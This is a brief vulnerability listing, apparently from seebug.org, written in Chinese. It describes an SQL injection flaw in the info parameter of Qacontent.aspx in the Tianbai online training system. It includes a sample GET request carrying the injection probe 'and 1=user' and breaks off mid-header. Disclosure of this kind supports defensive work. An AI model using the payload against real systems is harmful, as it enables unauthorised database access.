CVE Search Engine - Security Vulnerabilities and Exploits Search Tool

seebug.org•added 2016/04/21 12:0 a.m.•30 views

天柏在线培训系统 Qa_content.aspx 参数info SQL注入漏洞

0x01漏洞简介天柏在线培训系统网校版在/Webpage/Qacontent.aspx处对参数info过滤不严格，导致出现SQL注入漏洞。远程攻击者可以利用该漏洞执行SQL指令。 0x02漏洞利用漏洞测试地址： http://.../Webpage/Qacontent.aspx?info=4124 参数info存在注入测试数据： GET /Webpage/Qacontent.aspx?info=4124%20and%201=user HTTP/1.1 Host: ... User-Agent: Mozilla/5.0 Windows NT 6.3; WOW64; rv:38.0...